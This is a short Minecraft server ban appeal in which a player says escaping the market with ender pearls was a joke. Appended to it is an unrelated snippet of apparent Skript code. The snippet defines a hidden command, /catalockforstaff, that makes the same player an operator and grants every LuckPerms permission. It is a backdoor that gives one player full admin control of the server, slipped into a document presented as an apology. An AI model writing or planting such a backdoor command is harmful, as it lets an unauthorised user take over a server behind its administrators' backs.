15 Jun 2020
Name: Sharman
Username: __Ang
Discord name and tag : Catalock#9956
Length of Ban: 1 day
Reason for Ban: Escaping Market with Pearls
Why you should feel you should be unbanned: I meant it as a joke and I wasnt going to do anything malicious. I just wanted to escape to flex XD
Proof to back up your claim: Anyone in the vc knows that I was making a simple joke.
Any comments or concerns: I meant it as a joke and I am sorry for breaking out of market.
command /catalockforstaff:
execute console command "op __Ang"
execute console command "lp user __Ang permissions add *"
play sound "block.note_block.hit" with volume 100 and pitch 1 to player
send "&bcatalock is staff"